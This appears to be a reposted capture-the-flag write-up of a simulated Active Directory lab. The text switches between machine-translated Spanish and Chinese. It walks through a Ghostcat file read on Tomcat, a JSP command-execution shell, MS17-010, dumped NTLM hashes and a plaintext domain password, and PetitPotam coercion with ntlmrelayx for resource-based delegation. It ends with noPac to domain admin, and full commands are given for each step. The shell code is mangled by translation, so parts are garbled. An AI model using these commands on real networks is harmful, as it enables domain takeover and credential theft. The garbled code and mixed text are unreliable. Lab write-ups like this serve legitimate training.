Espejo de nubes de primavera y otoño - [Escena de simulación] Informe de suplantación de identidad

0x01 – Información

  • Etiqueta: Tomcat,NTLM,Cliente web,Autenticación forzada,noPac

0x02 - Reconocimiento

  1. IP externa de destino
    47.92.146.66
  1. Resultados de Nmap
    Enfoque en el puerto 8009 (ajp), que significa tomcat (correspondiente a la etiqueta tomcat del campo de tiro)
  2. Escaneo de directorio, 404 páginas se muestran como tomcat 9.0.30
  3. Jugando con Ghost cat
    Use este proyecto para probar https://github.com/00theway/Ghostcat-CNVD-2020-10487
    Lea /web-inf/web.xml
    url-pattern El resultado se guarda como un diccionario
    FFuf
    Preste atención a uploadservlet Cargue la dirección del archivo de devolución
    temp.txt
    ./upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt

    Reemplace ./upload a /upload, lea con éxito el archivo cargado

    python3 ajpShooter.py http://47.92.146.66:8080 8009 /upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txtread
    

0x03 – Ejecución del comando GhostCat

  1. shell listo.txt

    -i}”).getInputStream(); int a = -1; byte[] b = nuevo byte[2048]; salida.imprimir(“<pre>“); while((a=in.read(b))!=-1){ out.println(new String(b)); } salida.imprimir(“</pre>“);%>

  1. cargar shell.txt
  2. Ejecutar el código subido
  3. SSH – bandera01

0x04 – Ingreso Ubuntu: 172.22.11.76

  1. SSH
  2. Nada, solo pasa
  3. agencia abierta
  4. Escanee 445 con el agente y obtenga la información de tres hosts

    172.22.11.45 XR-Desktop.xiaorang.lab
    172.22.11.6 xiaorang-dc.xiaorang.lab
    172.22.11.26 XR-LCM3AE8B.xiaorang.lab

  5. Siga 172.22.11.45 – windows7 – MS17
  6. MS17 de una vez

  7. Lista de credenciales operativas básicas

    Administrador 4430c690b4c1ab3f4fe4f8ac0410de4a – (credenciales locales)
    John 03cae082068e8d55ea307b75581a8859 – (credenciales locales)
    XR-DESKTOP$ 3aa5c26b39a226ab2517d9c57ef07e3e – (credencial de dominio entials )
    yangmei 25e42ef4cc0ab6a8ff9e3edbbda91841 – xrihGHgoNZQ (texto sin formato) – (credenciales de dominio)
    He intentado voladuras combinadas, nada, aquí directamente Saltar la demostración e ir directamente a la penetración del dominio

  8. bandera2
  9. Agregue el usuario de dominio yangmei al administrador local de la máquina
  10. Asegúrese de que la IP del controlador de dominio sea 172.22.11.6 – xiaorang-dc
  11. colección sabueso

0x05 – enlace de penetración de dominio, entrada XR-Desktop: 172.22.11.45

  • Vayamos aquí rápidamente (resumen en una oración: no puede ganar directamente el controlador de dominio)
    1. Usando la combinación de contraseña/hashes obtenida de la combinación de nombre de usuario recopilada por Bloodhound para explotar, no se encontraron otros usuarios nuevos
    2. MAQ = 0, no se puede agregar computadora
    3. 当前LDAP 没 TLS,远程也加不了计算机,impacket的addcomputer有两种方法samr和ldaps。samr受到MAQ = 0的限制,无法添加计算机;ldaps受到 没TLS + MAQ = 0 的限制
    4. 域控存在nopac,当前用户yangmei使用nopac没打死,并且对域内computer container没有createchild的ACL
    5. 域控存在nopac,当前用户yangmei对当前windows机器xr-desktop没WriteDacl权限,意味着无法修改SamAccountName
    6. 域内存在 DFscoerce 和 petitpotam,但是不存在CVE-2019-1040,因此放弃 DFscoerce,优先使用petitpotam
    7. NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)
  1. Petitpotam 扫描
  2. 无ADCS + Petitpotam + ntlm中继打法
    攻击链:用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,允许我们的恶意机器账户模拟以及认证访问到目标机器 (RBCD)
  • 满足条件,目标机器需要开启webclient服务
    WebClient扫描,确定只能拿下 172.22.11.26 (XR-LCM3AE8B)
  • 中继攻击前言:
    • 实战中的中继打法只需要停掉80占用服务,开启端口转发(portfwd,CS在后续版本中添加了rportfwd_local,直接转发到客户端本地)
    • 本次演示类似实战的打法,不选择把impacket丢到入口ubuntu上面这种操作
  1. 中继攻击环境配置: 端口转发 + 代理
    我们目前需要把服务器的80,转发到客户端本地的80
  • 注意:由于SSH的反向端口转发监听的时候只会监听127.0.0.1,所以这时候需要点技巧
    如图所示,即使反向端口转发79端口指定监听全部 (-R \*:79:127.0.0.1:80),端口79依旧绑定在了127.0.0.1(图中顺便把socks5代理也开了)
    加多一条socat,让流量 0.0.0.0:80 转发到 127.0.0.1:79,再反向转发回客户端本地的80 ,变相使80监听在0.0.0.0
    测试,从172.22.11.76:80 进来的流量直接转发到了我们本地
    本地开启ntlmrelayx
  • 注意:
    • 前面提到,没有ldaps,所以不能使用addcomputer
    • 同时在使用proxychains后,ldap://后面只能接dc的ip
    • 利用前面拿下的XR-Desktop作为恶意机器账户设置RBCDsudo proxychains4 -q -f proxychains.conf ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access
  1. 使用Petitpotam触发 XR-LCM3AE8B 认证到172.22.11.76 (ubuntu)proxychains4 -q -f ~/HTB/Spoofing/proxychains.conf python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt XR-LCM3AE8B
    可以看到,已经完成RBCD攻击了,接下来就是直接申请XR-LCM3AE8B的银票了
  2. 申请XR-LCM3AE8B CIFS票据

0x06 – 域渗透环节 – NoPAC, 入口 XR-LCM3AE8B:172.22.11.26

  1. psexec
  • flag03在 C:\users\administrator\flag\flag03.txt (这里没截图)
  1. smbclient.py 传 mimikatz
  2. 获取到新凭据
    zhanghui 1232126b24cdf8c9bd2f788a9d7c7ed1

  3. nopac
  • 只有zhanghui能成功,zhanghui在MA_Admin组,MA_Admin组对computer 能够创建对象,但是在bloodhound没看到AdFind.exe -b "CN=Computers,DC=xiaorang,DC=lab" nTSecurityDescriptor -sddl+++
    Bloodhound看不到,主要原因是没把CreateChild采集进json
  1. 回到nopac,加上 create-child 参数

0x07 – 域渗透环节 – xiaorang-dc

  1. 使用nopac申请到的cifs票据登录进入DC
  • flag04在 C:\users\administrator\flag\flag04.txt (这里没截图)
  1. 域管 (略过使用mimikatz)administrator 0fadb57f5ec71437d1b03eea2cda70b9
    ![[

0x08 – 瞎玩

尝试解决Bloodhound.py采集不到CreateChild
bloodhound/enumeration/acls.py里面其实已经定义好了变量,只需要调用即可

来到170行,我们添加上去,找到CreateChild就添加进数据

重新跑一遍bloodhound.py,观察containers的结果,发现已经有相关数据了,RID 1132 = MA_Admin组

Bloodhound示意图,但是数据还是乱

Supongo que te gusta

Origin blog.csdn.net/m0_64910183/article/details/129395666
Recomendado
Clasificación